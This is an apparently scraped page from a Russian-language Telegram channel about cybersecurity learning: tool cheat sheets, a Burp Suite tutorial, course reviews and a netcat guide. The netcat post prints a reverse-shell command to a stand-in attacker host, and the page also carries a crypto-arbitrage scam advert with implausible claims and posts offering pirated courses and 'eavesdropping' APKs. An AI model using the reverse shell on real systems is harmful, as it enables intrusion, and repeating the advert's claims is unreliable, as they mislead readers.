CodeGuard: Archive


Гео и язык канала: Россия, Русский
Категория: Технологии


Полезные ресурсы
Автор: @Arakcheev_Ruslan
Все каналы: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Купить рекламу: https://telega.in/c/+Zw_AVoZ_AHc3MDli

Связанные каналы

Гео и язык канала
Россия, Русский
Категория
Технологии
Статистика
Фильтр публикаций


tcpdump HD.png
1.9Мб
📄 Mindmap по командам Tcpdump

Tcpdump — это утилита командной строки для перехвата и анализа пакетов в компьютерных сетях


😈 CodeGuard: Archive


🎥 Твой первый перехват трафика: Burp Suite на практике

Если ты давно хотел понять, как работает Burp Suite, но боялся, что это сложно — вот видео, которое развеивает миф. Автор берёт OWASP Juice Shop и показывает всё на живом примере: что происходит между браузером и сервером, как перехватить запрос, как его изменить и что вернёт сервер.

Что внутри
🔵HTTP History — смотрим все запросы, которые браузер отправил на сервер. Учимся читать заголовки, параметры, куки.
🔵Intercept — включаем перехват. Запрос останавливается до того, как уйдёт на сервер. Ты можешь его изменить.
🔵Repeater — отправляем запрос повторно, меняем параметры, смотрим на ответ. Это основной инструмент для ручного тестирования.
🔵Практический эксперимент — в конце автор показывает уязвимость Broken Access Control / IDOR на той же Juice Shop. Ты видишь, как изменение одного параметра даёт доступ к чужим данным.

Всё — в учебной лаборатории. Никаких реальных сайтов, никаких последствий.

Почему это стоит посмотреть
Burp Suite — стандарт в веб-пентесте. Без него не обходится ни один баг-хантер. Но многие новички открывают его и не понимают, с чего начать. Это видео даёт первый практический опыт: ты не просто смотришь, а повторяешь. После него Burp перестаёт быть «страшным инструментом» и становится рабочим.

😈 CodeGuard: Archive


🔴В 2025 году Россияне заработали 5,3 млрд рублей на арбитраже криптовалют

По данным Минфин 32% граждан покинули своё место работы поскольку уже в первый месяц смогли заработать 250 000 рублей, а через 2-3 месяца с легкостью вышли на семизначные числа.

Самое смешное, что лишь 8% россиян что-то слышали об этой профессии хотя все инструкции бесплатно лежат на канале Арбитраж Криптовалют

Там объясняют, как имея телефон и доступ в интернет заработать свои первые $3000. Причём разжёвывают так доступно, что поймёт даже ребенок. Кстати, на канале сегодня вышла новая рабочая связка!

Ссылка для входа — https://t.me/+FDHP26XDCSxkYzYy


HandsOn_Cybersecurity_Career_Playbook_White2Hack_I.P._2026.pdf
414.7Кб
📄 Hands-On Cybersecurity Career Playbook: как техническому специалисту продать себя дороже, не уходя в менеджмент

Что это
✨Мини-брошюра (PDF) от автора Telegram-канала White2Hack — Ивана Пискунова. Не книга в классическом смысле, а концентрат практики: личный опыт, заметки, HR-курсы, анализ собеседований и рынка ИТ/ИБ.
✨Для кого: technical специалисты — junior, middle, senior, AppSec, DevSecOps, pentest, vuln management, cloud security, detection/SOC. Те, кто «работает руками» и хочет упаковать свой опыт так, чтобы рынок платил больше.


😈 CodeGuard: Archive


Bash_security_ops_handbook_2026_release_1_1_White2Hack_I_P_2026.pdf
409.1Кб
BASH БАЗА ДЛЯ КИБЕРБЕЗОПАНОСТИ, I.P. | White2Hack, 2026 (ver. 1.1), free editon

Новичкам в ИБ — если ты знаешь базовые команды, но не понимаешь, как применить их в безопасности. Книга показывает переход от «умею вводить команды» к «умею решать задачи».
Админам — если хочешь расширить Bash-навыки в сторону безопасности. Многие приёмы применимы и в обычной работе.
Студентам — как дополнение к курсам по Linux. Книга даёт практику, которой часто не хватает в теории.


😈 CodeGuard: Archive


netcat: одна утилита, которая умеет всё

Сегодня разбираем инструмент, который появился в 1995 году и до сих пор стоит в арсенале каждого админа и пентестера. Netcat — «швейцарский нож TCP/IP». Одна команда — и ты можешь слушать порты, передавать файлы, сканировать сети и даже получить shell.

Что это
nc (или netcat) — утилита для работы с TCP и UDP. Она читает и пишет данные через сетевые соединения. Не имеет встроенного шифрования, не умеет в HTTP — но именно поэтому универсальна.
5 вещей, которые я делаю через netcat
1. Проверить, открыт ли порт
bash
nc -zv 192.168.1.1 22
Результат: Connection to 192.168.1.1 22 port [tcp/ssh] succeeded! Если порт закрыт — Connection refused.
Это быстрее, чем nmap, когда нужно проверить один порт.

2. Передать файл между машинами
На приёмнике:
nc -l -p 4444 > received_file

На отправителе:
nc 192.168.1.2 4444 < file_to_send
Файл ушёл. Без SCP, без FTP, без настройки. Если машины в одной сети — работает за секунды.

3. Слушать трафик на порту
nc -l -p 8080
Теперь всё, что приходит на порт 8080, выводится в терминал. Удобно для отладки: клиент стучится — ты видишь запрос.

4. Простой чат между двумя машинами
На первой:
nc -l -p 4444

На второй:
nc 192.168.1.2 4444
Пишешь текст — он появляется у собеседника. Небезопасно, но для быстрой связи в локальной сети работает.

5. Получить shell (если сервер уязвим)
Это классика пентеста. Если на сервере есть RCE, атакующий может запустить:
nc -e /bin/bash attacker_ip 4444

Тогда на машине атакующего:
nc -lvnp 4444
И он получает shell. Именно поэтому nc часто называют «backdoor в одну строку». В легальном пентесте это демонстрирует опасность RCE.

😈 CodeGuard: Archive


Я прошёл курс по Threat Intelligence за 6 часов. Вот что осталось в голове

Если ты думаешь, что threat intelligence — это для избранных из больших корпораций, этот курс тебя переубедит. Он бесплатный. И он объясняет, как думать, а не просто собирать IOC.

Что за курс
Introduction to Threat Intelligence — модуль в рамках бесплатной программы Introduction to Cyber Security от OpenLearn (The Open University). Он не про инструменты. Он про процесс: как превратить сырые данные в решение.
Курс короткий — около 6 часов. Но плотный. Никакой воды.


Что осталось в голове

🟣Первое: Intelligence ≠ Information
Данные — это факты. Информация — это данные с контекстом. Intelligence — это информация, на основе которой можно принять решение. Разница принципиальная. Можно собрать тысячу IOC и не иметь ни одного вывода.
🟣Второе: цикл разведки
Direction → Collection → Processing → Analysis → Dissemination. Пять шагов. Если пропустить первый (что именно мы хотим узнать?), всё остальное — трата времени. Курс учит начинать с вопроса, а не с инструмента.
🟣Третье: источники делятся на уровни
Стратегический (для руководства), операционный (для планирования), тактический (для SOC). Один и тот же инцидент выглядит по-разному на каждом уровне. Курс показывает, как не путать аудитории.
🟣Четвёртое: IOC устаревают
IP-адреса меняются за часы. Домены — за дни. Хеши — за недели. Курс объясняет, почему гоняться за IOC — плохая стратегия. Работать надо с TTP (тактиками, техниками, процедурами) — они живут дольше.
🟣Пятое: главное — не собрать, а объяснить
Самая сложная часть — не сбор данных. А формулировка вывода, которому поверят. Курс даёт шаблоны: как писать отчёт, чтобы его прочитали, а не отложили в сторону.


😈 CodeGuard: Archive


Такие шпоры нужны?
❤️ — да, приколдесно
👍 — нет, не приколдесно, время пол четвертого утра, админ иди спать...

😈 CodeGuard: Archive


🤔 Одна команда, которая найдёт топ-10 IP в логе

Задача: в access-логе найти, кто долбит сервер чаще всех. Открывать в редакторе — самоубийство.
cut -d' ' -f1 access.log | sort | uniq -c | sort -rn | head -10

Что происходит:
cut -d' ' -f1 — берёт первое поле (IP)
sort — сортирует (без него uniq не работает)
uniq -c — считает повторы
sort -rn — сортирует по числу
head -10 — топ-10

Результат:
8432 185.234.72.11
1204 91.201.43.7
872 45.155.204.19
8432 запроса с одного IP за день — это не человек. Это бот.

Запомни связку:
cut -d' ' -fN файл | sort | uniq -c | sort -rn | head
Меняешь номер поля — и считаешь что угодно: топ URL, топ User-Agent, топ кодов ответа.

😈 CodeGuard: Archive


🎓 КУРС, КОТОРЫЙ СТОИТ ПРОЙТИ: Introduction to Cybersecurity от Cisco Networking Academy
Суббота. Время для длинного материала. Этот курс я прошёл год назад — и до сих пор рекомендую его всем, кто хочет войти в ИБ, но не знает, с какой стороны подойти.

Почему именно он
Большинство вводных курсов по безопасности начинаются с определений: «что такое CIA Triad», «что такое угроза», «что такое уязвимость». Ты слушаешь 40 минут теории и не понимаешь, как это применить.

Cisco сделали иначе. Их курс — про ландшафт угроз и реальные сценарии. Ты не зубришь термины, а разбираешь кейсы: как фишинг выглядит в жизни, почему слабые пароли до сих пор работают, как атакующие используют социальную инженерию.
Курс бесплатный. Сертификат — тоже. Никаких скрытых платежей.

Что внутри
🟣Введение в кибербезопасность — что это, зачем нужно, какие роли существуют на рынке.
🟣Типы угроз — malware, фишинг, ransomware, социальная инженерия. С примерами и разбором.
🟣Защита данных — шифрование, аутентификация, контроль доступа. Без сложных формул.
🟣Безопасность сетей — как защищают периметр, что такое файрволы и VPN.
🟣Карьерные пути — какие есть позиции в ИБ, что нужно знать для каждой.

Курс рассчитан на 6 часов. Можно пройти за выходные.

Кому подойдёт
✨Новичкам — это лучшая точка входа. Ты получишь карту местности, а не набор разрозненных фактов.
✨Разработчикам — если ты пишешь код и хочешь понимать, как его атакуют.
✨Всем, кто хочет сменить профессию — курс даёт понимание, нужно ли тебе это вообще.

Что после него
Курс не делает тебя специалистом. Он даёт фундамент. Дальше можно идти в:
TryHackMe — практические лаборатории для закрепления.
PortSwigger Web Security Academy — если хочешь в веб-безопасность.
Linux Foundation LFS101 — если понимаешь, что без Linux в ИБ никуда.
Но первый шаг — вот этот курс.

Как проходить
Не просто смотри видео. После каждого модуля — пауза. Запиши три вещи, которые были новыми. Потом попробуй объяснить их кому-то вслух (или в заметках). Если не получается — вернись и перечитай.
Так материал закрепляется.

😈 CodeGuard: Archive


ISO 27001-2022 Controls HD.png
1.9Мб
📄 Шпаргалка по направлениям ISO

😈 CodeGuard: Archive


👋 Всем привет! Недавно закончил крупное обновление!
@CTF_CodeGuard_bot — он стал ещё мощнее 😈

Что добавил:
🤖 ИИ-ассистента Элиота — шарит в ИБ, объяснит непонятное и поможет с заданиями, но готовое решение вам не сольёт))

📚 Базу знаний и шпаргалки — Linux, сети, Web, OSINT, SQL. Всё под рукой, с поиском и закладками.

📰 Разборы реальных инцидентов — что взломали, почему и как от такого защититься.

🧭 Личный план развития — чтобы видеть свой прогресс и понимать, что изучать дальше.


💀 Залетайте, пробуйте и пишите, как вам обновление. Обратная связь поможет сделать бота ещё лучше.
Всех обнял ❤️

👉 https://t.me/CTF_CodeGuard_bot




DualSpacePro_200322143425.apk
17.4Мб
😎 Клонер без границ

😎 Лучшее nрuл0жение-кл0нер, позволяющий дублuровать любые npил0жения сколько угодно раз


XYplorer 21.50.0100.rar
5.0Мб
😎XYpl@rer — альтернатива проводнику

Мощный файловый менеджер для тех, кто перерос стандартный Windows Explorer. Простой и привычный интерфейс, но с расширенной функциональностью: вкладки, продвинутый поиск, удобная навигация, кастомизация под себя.

Отлично подойдёт для тех, кто работает с большим количеством файлов и хочет ускорить рутину.


Everything Setup.exe
1.9Мб
😎 Мгновенный поuck по файлам

😎 Данный позволяет мгновенно искать по имени файла. Работает намного быстрее, чем стандартный поuск Винды


Program400tb.zip
53.4Мб
😎 Обучение программирования

😎 978 курсов с Udemy по всем направлениям. Программирование, дизайн, блокчейн, нейросети и тд. От новичка до профи всё в одном файле. Общая стоимость курсов переваливает за 2 миллиона рублей.


SpyDetect.zip
3.5Мб
🐰Какие приложения получают доступ к камере?

Прога в реальном времени показывает, какие приложения используют камеру, микрофон и другие модули устройства.


Fake Contacts.apk
16.8Мб
😎 Контра геtконtаkт

😎 Данный осуществляет подмену контаkt0в в сnuсkе для увеличения безопасности


eagsec.apk
5.8Мб
😎Полная прослушка

😎Прослушка, возможность настроить эквалайзер для более сильной прослушки отключая посторонние шумы.

Показано 20 последних публикаций.